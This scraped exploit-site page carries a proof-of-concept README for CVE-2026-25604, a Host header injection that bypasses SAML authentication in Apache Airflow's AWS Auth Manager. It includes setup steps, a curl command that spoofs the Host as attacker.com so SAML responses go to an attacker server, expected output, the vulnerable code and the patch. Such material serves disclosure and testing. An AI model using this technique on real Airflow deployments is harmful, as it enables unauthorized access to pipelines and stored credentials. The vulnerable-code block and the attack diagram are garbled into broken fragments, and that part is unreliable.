Exploit for Origin Validation Error in Apache Airflow_Providers_Amazon CVE-2026-25604

## https://sploitus.com/exploit?id=F4427F45-0EAA-5A2E-A203-5A502B9376F4
# CVE-2026-25604 PoC

**Host Header Injection leading to SAML authentication bypass in Apache Airflow's AWS Auth Manager**

An attacker can inject a malicious `Host` header into the SAML login flow, causing the Assertion Consumer Service (ACS) URL to point to an attacker-controlled server. This allows the attacker to **capture valid SAML responses** and **replay them to gain unauthorized access** to the victim Airflow instance — or reuse tokens across different Airflow instances with different access controls.

## Affected Versions

| Package | Affected | Fixed |
|---------|----------|-------|
| `apache-airflow-providers-amazon` | 8.0.0 – 9.21.x | **9.22.0** |

### Official Description

> **CVE-2026-25604: Origin Validation Error in AWS Auth Manager (CWE-346)**
>
> In AWS Auth Manager, the origin of the SAML authentication has been used as provided by the client and not verified against the actual instance URL. This allowed to gain access to different instances with potentially different access controls by reusing SAML response from other instances.
>
> — [NVD](https://nvd.nist.gov/vuln/detail/CVE-2026-25604)

### References

| Source | Link |
|--------|------|
| NVD | https://nvd.nist.gov/vuln/detail/CVE-2026-25604 |
| Fix PR | https://github.com/apache/airflow/pull/61368 |
| Fix Commit | [`1a86aec`](https://github.com/apache/airflow/commit/1a86aec01d827ba8caf41b645db56663a9a61850) |

## Vulnerability Summary

Apache Airflow's AWS Auth Manager uses SAML 2.0 via AWS IAM Identity Center for authentication. When constructing the SAML authentication request, the `_prepare_flask_request()` method reads the `Host` header directly from the incoming HTTP request to build the ACS callback URL:

```python
# Vulnerable code in aws_auth_manager.py
def _prepare_flask_request(req):
    host = req.headers.get("Host", req.host)  # │                        │
     │                      │                        │
     │                      │ 2. SAML AuthnRequest   │
     │                      │    ACS URL =           │
     │                      │    evil.com:8080/       │
     │                      │    login_callback       │
     │                      │───────────────────────>│
     │                      │                        │
     │                      │ 3. User authenticates  │
     │                      │    at IdP login page   │
     │                      │                        │
     │ 4. IdP redirects     │                        │
     │    SAMLResponse to   ││                        │
     │                      │                        │
     │ 7. Authenticated!    │                        │
     │:/login_callback`
- **Application SAML audience:** `aws-auth-manager-saml-client`
- Copy the **SAML metadata URL** from the Identity Center console.

### 2. Start the mock vulnerable Airflow server

```bash
python mock_airflow.py  [PORT]
```

For example:

```bash
python mock_airflow.py https://portal.sso.us-east-1.amazonaws.com/saml/metadata/XXXX 8080
```

### 3. Send a login request with a spoofed Host header

In a separate terminal, initiate a SAML login with a manipulated `Host` header:

```bash
curl -v -H "Host: attacker.com:9090" http://127.0.0.1:8080/login
```

### 4. Observe the redirect

The server responds with a `302 Redirect` to the AWS IAM Identity Center login page. Inspect the SAML `AuthnRequest` — the `AssertionConsumerService` URL will point to `attacker.com:9090/login_callback` instead of the legitimate server.

### 5. Expected output

On the mock Airflow server console:

```
[LOGIN] Host header: attacker.com:9090
[DEBUG] http_host=attacker.com, server_port=9090
```

The SAML AuthnRequest now instructs the IdP to deliver the authenticated SAML response to `attacker.com:9090`, giving the attacker a valid token to replay.

## Vulnerable Code

`airflow/providers/amazon/aws/auth_manager/aws_auth_manager.py` — the `_prepare_flask_request()` method:

```python
host = request.headers.get("Host", request.host)
```

This line trusts the client-provided `Host` header without validating it against the configured Airflow base URL (`AIRFLOW__API__BASE_URL`).

## Patch

The fix ([PR #61368](https://github.com/apache/airflow/pull/61368), merged Feb 3, 2026) replaces the request-derived host with the value from Airflow configuration:

```diff
- host = request.headers.get("Host", request.host)
+ host = conf.get("api", "base_url")
```

This ensures the ACS URL always matches the actual instance URL configured by the administrator, regardless of what `Host` header the client sends.

## Impact

- **Confidentiality:** An attacker gains authenticated access to Airflow, which may contain sensitive DAG configurations, connections with credentials, and data pipeline metadata.
- **Integrity:** Unauthorized users can trigger, modify, or delete DAGs, potentially disrupting critical data workflows.
- **Cross-instance escalation:** In multi-tenant environments, SAML tokens can be reused across instances with different RBAC configurations.

## Credits

- **Discovered by:** Sungwuk Jung
- **Fixed by:** Vincent Beck ([@vincbeck](https://github.com/vincbeck)), Apache Airflow Security Team

## Disclaimer

This proof-of-concept is provided for **educational and authorized security testing purposes only**. Use it responsibly and only against systems you own or have explicit permission to test.